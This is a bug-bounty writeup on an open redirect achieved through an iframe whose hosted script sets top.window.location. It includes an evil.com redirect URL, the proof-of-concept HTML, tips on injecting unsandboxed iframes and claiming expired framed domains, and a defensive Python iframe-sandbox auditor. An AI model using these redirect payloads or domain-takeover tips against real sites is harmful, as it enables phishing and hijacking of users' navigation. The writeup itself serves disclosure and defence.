$1000 for Open redirect via unknown technique [BugBounty writeup]

https://example.com/login?redirectUrl=https://app.example.com
https://example.com/login?redirectUrl=https://evil.com
<iframe src="https://example.com" id="child"></iframe>
<script>
// Reading a cross-origin frame's document is blocked by the same-origin policy:
// this access throws a SecurityError, so framed content cannot be read this way.
var a = document.getElementById("child").contentWindow.document;
console.log(a.body.innerHTML);
</script>
<iframe src="http://ruvlolmail.temp.swtest.ru/toplevel.html"></iframe>
<!-- document served at the framed URL above -->
<html>
<head>
</head>
<body>
<script>
// Navigates the embedding (top-level) page, not just the frame.
// Without a sandbox attribute, a cross-origin frame is allowed to do this.
top.window.location = "https://www.google.com"
</script>
</body>
</html>
<!-- sandboxed: allow-scripts and allow-same-origin do not include top-level navigation, so the assignment above is blocked -->
<iframe sandbox="allow-scripts allow-same-origin" src="http://ruvlolmail.temp.swtest.ru/toplevel.html"></iframe>
https://hackerone.com/reports/437142
  • If you can insert an iframe with an arbitrary URL value (for example, on a forum), check whether it has a sandbox attribute and whether that sandbox allows top-level navigation.
  • If there is an iframe pointing to an expired domain, you could try to claim it and place your script there.
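The two takeaways above amount to an audit of the iframes a page embeds: which ones point at third-party hosts, and which of those are allowed to navigate the top-level page. The script below is an added example, not code from the writeup or the HackerOne report; it parses HTML with Python's standard library, applies the sandbox rules the writeup's snippets illustrate (no sandbox means unrestricted; a sandbox without an allow-top-navigation token blocks `top.window.location`; allow-scripts plus allow-same-origin on a same-origin frame lets the frame strip its own sandbox), and lists the third-party frames that deserve review for expired or untrusted domains. All hostnames in the sample HTML are constructed placeholders.

```python
"""Audit <iframe> tags for sandbox settings that allow top-level navigation."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# sandbox tokens that let the framed document navigate the embedding page
TOP_NAV_TOKENS = {
    "allow-top-navigation",
    "allow-top-navigation-by-user-activation",
    "allow-top-navigation-to-custom-protocols",
}


class IframeCollector(HTMLParser):
    """Collect the attribute map of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # attrs is a list of (name, value); value is None for a bare
            # attribute such as `sandbox` written without a token list
            self.iframes.append(dict(attrs))


def audit_iframe(attrs, page_host):
    """Describe whether one iframe may navigate the page that embeds it."""
    src = attrs.get("src") or ""
    # a relative src is served from the embedding page's own host
    frame_host = (urlparse(src).hostname or page_host).lower()
    same_host = frame_host == page_host.lower()

    if "sandbox" not in attrs:
        top_nav, reason = True, "no sandbox attribute"
    else:
        tokens = set((attrs["sandbox"] or "").lower().split())
        granted = tokens & TOP_NAV_TOKENS
        if granted:
            top_nav, reason = True, "sandbox grants " + ", ".join(sorted(granted))
        elif {"allow-scripts", "allow-same-origin"} <= tokens and same_host:
            # a same-origin frame running scripts can remove its own sandbox
            top_nav, reason = True, "allow-scripts + allow-same-origin on a same-origin frame"
        else:
            top_nav, reason = False, "sandbox without top-navigation tokens"

    return {
        "src": src,
        "host": frame_host,
        "third_party": not same_host,
        "can_navigate_top": top_nav,
        "reason": reason,
    }


def audit_html(html, page_host):
    """Audit every iframe in an HTML document embedded on page_host."""
    parser = IframeCollector()
    parser.feed(html)
    return [audit_iframe(a, page_host) for a in parser.iframes]


def flag_risky(html, page_host):
    """Srcs of third-party frames that could redirect the whole page.
    These are the frames whose domains should be checked for expiry."""
    return [f["src"] for f in audit_html(html, page_host)
            if f["third_party"] and f["can_navigate_top"]]


# constructed sample page; every host below is a placeholder
SAMPLE_HTML = """
<iframe src="http://third-party.example/toplevel.html"></iframe>
<iframe sandbox="allow-scripts allow-same-origin" src="http://third-party.example/toplevel.html"></iframe>
<iframe sandbox="allow-scripts allow-top-navigation" src="http://widget.example/w.html"></iframe>
<iframe sandbox src="http://ads.example/a.html"></iframe>
<iframe src="/help/faq.html"></iframe>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML, "example.com"):
        print(finding)
    print("review for expired domains:", flag_risky(SAMPLE_HTML, "example.com"))
```

Run against the sample page, the first (unsandboxed) and third (allow-top-navigation) third-party frames are flagged, the frame sandboxed with only allow-scripts and allow-same-origin is not, and the relative same-host frame is ignored because it is not third-party content. The script inspects static HTML only; frames injected by scripts at runtime need to be captured from a rendered DOM first.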
